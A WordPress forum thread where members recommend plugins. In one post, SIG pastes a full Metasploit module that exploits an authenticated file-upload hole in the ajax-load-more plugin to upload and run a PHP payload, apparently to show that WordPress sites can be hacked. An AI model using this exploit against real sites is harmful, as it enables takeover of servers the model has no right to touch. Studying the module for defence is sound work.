What are your favorite Wordpress Plugins?

aceofadsense

New member
Joined
Jan 22, 2013
Messages
69
Points
0
Are you running a blog on Wordpress CMS? What are Your favorite Wordpress Plugins that you would recommend to use for better blogging?
 

SIG

Active member
Joined
Oct 16, 2015
Messages
123
Points
28
My favorite WordPress plugins are:

  1. WordFence (Security plugin) - very important plugin.
  2. Jetpack (by WordPress) - good to viewing visitors, search terms, what visitors clicked on, where did they came from, etc. - It also comes with a bunch of handy features.
  3. WPSmush - to reduce image sizes - good for speeding up a little bit your blog/site.
  4. Contact form 7 - good contact form creator.


This is quite it.
 

Hugo E.

Active member
Joined
Sep 8, 2014
Messages
288
Points
28
Hugo E.
According to my personal opinion, WP is already secure why you need a security plugin for it..It's weird.
 

SIG

Active member
Joined
Oct 16, 2015
Messages
123
Points
28
SIG
WordPress has vulnerabilities, and can be hacked. And I can prove it.

This is the most recent one:
WordPress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability

Discovered on: 2015-10-18

Going offtopic with this:
Code:
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
   
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
   
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Plugin ajax-load-more Authenticated Arbitrary File Upload',
      'Description'     => %q{
          This module exploits an authenticated file upload vulnerability in Wordpress plugin
ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for the exploit to work.
          Tested with version v2.7.3. (May work on older versions).
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pizza Hat Hacker <PizzaHatHacker[A]gmail[.]com', # Vulnerability discovery & Metasploit module
        ],
      'References'      =>
        [
          ['WPVDB', '8209']
        ],
      'DisclosureDate'  => 'Oct 02 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['ajax-load-more', {}]],
      'DefaultTarget'   => 0
    ))
     
    register_options(
    [
         OptString.new('WP_USER', [true, 'A valid wordpress username', nil]),
         OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
    ], self.class)
  end
   
  def user
    datastore['WP_USER']
  end
   
  def password
    datastore['WP_PASSWORD']
  end
   
  def check
    # Check plugin version
    ver = check_plugin_version_from_readme('ajax-load-more, 2.8.2')
    if ver
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end
   
  def exploit
    # Wordpress login
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
     
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - Retrieving WP nonce from #{url}")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => url,
      'cookie'   => cookie
    })
     
    if res and res.code == 200
      # "alm_admin_nonce":"e58b6d536d"
      res.body =~ /\"alm_admin_nonce\":\"([0-9a-f]+)\"/
      wp_nonce = $1
      if wp_nonce
        print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}")
      else
        vprint_error("#{peer} #{res.body}")
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.")
    end
 
    print_status("#{peer} - Trying to upload payload")
     
    # Generate MIME message
    data = Rex::MIME::Message.new
    data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"')
    data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"')
    data.add_part('default', nil, nil, 'form-data; name="type"')
    data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="value"')
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_admin_ajax),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s,
      'cookie'   => cookie
    })
     
    filename = 'default.php'
    if res
      if res.code == 200
        lines = res.body.split("\n")
        if lines.length > 0
          message = lines[lines.length - 1]
          if message.include?('Template Saved Successfully')
            register_files_for_cleanup(filename)
          else
            vprint_error("#{peer} - Unexpected web page content : #{message}")
          end
        else
          fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response")
        end
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
     
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
 

SenseiSteve

Active member
Joined
Nov 11, 2015
Messages
215
Points
28
SEO by Yoast
WordFence
Contact Form 7
WP Edit

And yes, WordPress sites get hacked all the time. Keeping your themes and plugins up to date helps, but make sure you download plugins from authority sites and ensure they stay up to date with the current version of WordPress.
 

ulterios

New member
Joined
Nov 25, 2015
Messages
1,267
Points
0
It all depends on the site in some cases, but in general here are my favorites:

WordFence Security - Lots of good features and has a cache option which actually works real well

Slider Captcha - Keeps bots from trying to login to my site as well as eliminate spam

Google Analytics Dashboard for WP - To keep track of traffic and visitors

All In One SEO Pack - A lot of good stuff to make some SEO tasks easier.
 

Ron Killian

New member
Joined
Dec 3, 2015
Messages
804
Points
0
I agree Wordpress can be hacked. Anything can be hacked. Though most people who own wordpress have NO clue how many times each day people (bots) try to break in. Until you have a good security plugin, then you see what the bad guys are trying to do.

I put in another vote for Wordfence, great plugin.

Tried several image compression plugins, but best I found was Kraken. Works great.

Also like Intense Wordpress plugin. Ton's of shortcodes to dress up my content very nicely.

Disqus for comments.

As Ulterios said, Google analytics dashboard is nice.

MCE table button, gotta have tables.

Premium SEO pack - for obvious reasons.

Q2W3 Fixed Widget - Fixes widgets you want to stay in the sidebar as people scroll.

Simple Page Sidebars - Make custom sidebars and any post or page.

Uber Menu for better menu's, bigger, ect.

Wp Author Box - Much better author box.

WP Ad Pro to rotate ads and banners, track ad stats.

Just started using Zendesk for support. Think I like it. Can't say 100% yet. But there are not many good support plugins out there.

Woocommerce and many related plug-ins for it.
 

dnapick

New member
Joined
Jan 22, 2016
Messages
2
Points
0
It depends on a project but I always use;

SEo by Yoast
Custom CSS
WP Super Cache
 

tayyabwpb

New member
Joined
Apr 6, 2021
Messages
29
Points
3
My Favorites SEO Plugins are

  1. Analytify for Google Analytics
  2. Yoast SEO for SEO purpose
  3. WP Rocket for Website Speed Optimization
  4. Imagify for Image Optimization
  5. Autoptimize for CSS & JS minification
  6. LoginPress for custom login page & Login Page Security
 
Last edited:

anad7kumar

New member
Joined
Dec 16, 2023
Messages
2
Points
1
My favorite plugins are Elementor, Starter Sites Kit, Yoast SEO, and Classic Editor.
 

Daniel@30

Active member
Joined
Apr 6, 2018
Messages
179
Points
28
  1. Yoast SEO: Helps optimize content for search engines and improves overall SEO.
  2. WP Super Cache: Speeds up website performance by generating static HTML files for faster page loads.
  3. Elementor: A user-friendly page builder that simplifies website design and customization.
 

greenhostcloud

New member
Joined
Mar 17, 2024
Messages
25
Points
3
Are you running a blog on Wordpress CMS? What are Your favorite Wordpress Plugins that you would recommend to use for better blogging?
My favorite Wordpress plugins for better blogging include Yoast SEO for optimizing the content, WP Rocket for faster loading times, and MonsterInsights for tracking the website analytics.
 

bluezooweb

New member
Joined
Jun 28, 2024
Messages
1
Points
0
My favorite would be Yoast SEO or Rank Math for SEO (they really help to optimize content for ranking better), WordFence (for security), Akisment (Block spammy comments), WP Rocket (for improving loading speed), Smush (to optimize images), and UpdraftPlus (for backup).

This are my favorite, as well as they will help in better blogging.
 
Older threads
Replies
4
Views
3,232
Replies
4
Views
3,731
Replies
12
Views
5,847
Newer threads
Latest threads
Replies
4
Views
240
Replies
2
Views
178
Replies
0
Views
158
Replies
0
Views
138
Similar threads
Replies
9
Views
6,857
Replies
14
Views
6,136
Replies
9
Views
6,129
Top